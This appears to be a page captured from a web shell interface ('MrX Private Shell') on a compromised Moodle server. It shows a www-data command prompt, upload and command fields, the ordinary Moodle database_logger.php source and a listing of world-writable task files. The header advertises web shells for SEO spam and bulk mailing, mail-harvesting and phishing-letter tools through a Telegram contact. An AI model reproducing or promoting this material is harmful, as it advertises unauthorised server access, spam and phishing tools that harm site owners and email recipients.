__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Database logger for task logging.
 *
 * @package    core
 * @copyright  2018 Andrew Nicols <andrew@nicols.co.uk>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
namespace core\task;

defined('MOODLE_INTERNAL') || die();

/**
 * Database logger for task logging.
 *
 * @copyright  2018 Andrew Nicols <andrew@nicols.co.uk>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
class database_logger implements task_logger {

    /** @var int Type constant for a scheduled task */
    const TYPE_SCHEDULED = 0;

    /** @var int Type constant for an adhoc task */
    const TYPE_ADHOC = 1;

    /**
     * Whether the task is configured and ready to log.
     *
     * @return  bool
     */
    public static function is_configured(): bool {
        return true;
    }

    /**
     * Store the log for the specified task.
     *
     * @param   task_base   $task The task that the log belongs to.
     * @param   string      $logpath The path to the log on disk
     * @param   bool        $failed Whether the task failed
     * @param   int         $dbreads The number of DB reads
     * @param   int         $dbwrites The number of DB writes
     * @param   float       $timestart The start time of the task
     * @param   float       $timeend The end time of the task
     */
    public static function store_log_for_task(task_base $task, string $logpath, bool $failed,
            int $dbreads, int $dbwrites, float $timestart, float $timeend) {
        global $DB;

        // Write this log to the database.
        $logdata = (object) [
            'type' => is_a($task, scheduled_task::class) ? self::TYPE_SCHEDULED : self::TYPE_ADHOC,
            'component' => $task->get_component(),
            'classname' => get_class($task),
            'userid' => 0,
            'timestart' => $timestart,
            'timeend' => $timeend,
            'dbreads' => $dbreads,
            'dbwrites' => $dbwrites,
            'result' => (int) $failed,
            'output' => file_get_contents($logpath),
            'hostname' => $task->get_hostname(),
            'pid' => $task->get_pid(),
        ];

        if (is_a($task, adhoc_task::class) && $userid = $task->get_userid()) {
            $logdata->userid = $userid;
        }

        $logdata->id = $DB->insert_record('task_log', $logdata);
    }

    /**
     * Whether this task logger has a report available.
     *
     * @return  bool
     */
    public static function has_log_report(): bool {
        return true;
    }

    /**
     * Get any URL available for viewing relevant task log reports.
     *
     * @param   string      $classname The task class to fetch for
     * @return  \moodle_url
     */
    public static function get_url_for_task_class(string $classname): \moodle_url {
        global $CFG;

        return new \moodle_url("/{$CFG->admin}/tasklogs.php", [
                'filter' => $classname,
            ]);
    }

    /**
     * Cleanup old task logs.
     */
    public static function cleanup() {
        global $CFG, $DB;

        // Delete logs older than the retention period.
        $params = [
            'retentionperiod' => time() - $CFG->task_logretention,
        ];
        $logids = $DB->get_fieldset_select('task_log', 'id', 'timestart < :retentionperiod', $params);
        self::delete_task_logs($logids);

        // Delete logs to retain a minimum number of logs.
        $sql = "SELECT classname FROM {task_log} GROUP BY classname HAVING COUNT(classname) > :retaincount";
        $params = [
            'retaincount' => $CFG->task_logretainruns,
        ];
        $classes = $DB->get_fieldset_sql($sql, $params);

        foreach ($classes as $classname) {
            $notinsql = "";
            $params = [
                'classname' => $classname,
            ];

            $retaincount = (int) $CFG->task_logretainruns;
            if ($retaincount) {
                $keeplogs = $DB->get_records('task_log', [
                        'classname' => $classname,
                    ], 'timestart DESC', 'id', 0, $retaincount);

                if ($keeplogs) {
                    list($notinsql, $params) = $DB->get_in_or_equal(array_keys($keeplogs), SQL_PARAMS_NAMED, 'p', false);
                    $params['classname'] = $classname;
                    $notinsql = " AND id {$notinsql}";
                }
            }

            $logids = $DB->get_fieldset_select('task_log', 'id', "classname = :classname {$notinsql}", $params);
            self::delete_task_logs($logids);
        }
    }

    /**
     * Delete task logs for the specified logs.
     *
     * @param   array   $logids
     */
    public static function delete_task_logs(array $logids) {
        global $DB;

        if (empty($logids)) {
            return;
        }

        $chunks = array_chunk($logids, 1000);
        foreach ($chunks as $chunk) {
            $DB->delete_records_list('task_log', 'id', $chunk);
        }
    }
}

Filemanager

Name Type Size Permission Actions
adhoc_task.php File 5.81 KB 0777
analytics_cleanup_task.php File 1.73 KB 0777
antivirus_cleanup_task.php File 1.91 KB 0777
asynchronous_backup_task.php File 3.45 KB 0777
asynchronous_copy_task.php File 9.2 KB 0777
asynchronous_restore_task.php File 4.26 KB 0777
automated_backup_report_task.php File 3.02 KB 0777
automated_backup_task.php File 1.65 KB 0777
backup_cleanup_task.php File 3.01 KB 0777
badges_adhoc_task.php File 2.29 KB 0777
badges_cron_task.php File 2.78 KB 0777
badges_message_task.php File 2.17 KB 0777
blog_cron_task.php File 2.16 KB 0777
build_installed_themes_task.php File 1.73 KB 0777
cache_cleanup_task.php File 1.38 KB 0777
cache_cron_task.php File 1.33 KB 0777
calendar_cron_task.php File 2.67 KB 0777
calendar_fix_orphaned_events.php File 2.63 KB 0777
check_for_updates_task.php File 1.6 KB 0777
clean_up_deleted_search_area_task.php File 1.71 KB 0777
complete_plans_task.php File 1.89 KB 0777
completion_daily_task.php File 8.03 KB 0777
completion_regular_task.php File 2.21 KB 0777
context_cleanup_task.php File 1.64 KB 0777
course_backup_task.php File 4.05 KB 0777
create_contexts_task.php File 1.54 KB 0777
database_logger.php File 5.55 KB 0777
delete_incomplete_users_task.php File 2.58 KB 0777
delete_unconfirmed_users_task.php File 2.54 KB 0777
failed_task_callbacks.php File 2.76 KB 0777
file_temp_cleanup_task.php File 4.36 KB 0777
file_trash_cleanup_task.php File 1.44 KB 0777
fix_file_timestamps_task.php File 1.26 KB 0777
grade_cron_task.php File 3.15 KB 0777
grade_history_cleanup_task.php File 2.09 KB 0777
h5p_clean_orphaned_records_task.php File 2.44 KB 0777
h5p_get_content_types_task.php File 2.16 KB 0777
hide_ended_courses_task.php File 1.61 KB 0777
logging_trait.php File 3.1 KB 0777
logmanager.php File 9.79 KB 0777
manager.php File 62.36 KB 0777
messaging_cleanup_task.php File 2.72 KB 0777
password_reset_cleanup_task.php File 1.95 KB 0777
plagiarism_cron_task.php File 2.26 KB 0777
portfolio_cron_task.php File 2.91 KB 0777
question_preview_cleanup_task.php File 2.83 KB 0777
refresh_mod_calendar_events_task.php File 2.74 KB 0777
registration_cron_task.php File 1.37 KB 0777
scheduled_task.php File 22.88 KB 0777
search_index_task.php File 2.27 KB 0777
search_optimize_task.php File 1.76 KB 0777
send_failed_login_notifications_task.php File 8.11 KB 0777
send_login_notifications.php File 4.21 KB 0777
send_new_user_passwords_task.php File 3.33 KB 0777
session_cleanup_task.php File 1.76 KB 0777
show_started_courses_task.php File 5.13 KB 0777
stats_cron_task.php File 2 KB 0777
stored_progress_bar_cleanup_task.php File 1.68 KB 0777
stored_progress_task_trait.php File 2.04 KB 0777
sync_plans_from_template_cohorts_task.php File 2.24 KB 0777
tag_cron_task.php File 11.28 KB 0777
task_base.php File 8.45 KB 0777
task_lock_cleanup_task.php File 1.53 KB 0777
task_log_cleanup_task.php File 1.72 KB 0777
task_logger.php File 2.35 KB 0777
task_trait.php File 1.75 KB 0777
update_geoip2file_task.php File 7.64 KB 0777
Filemanager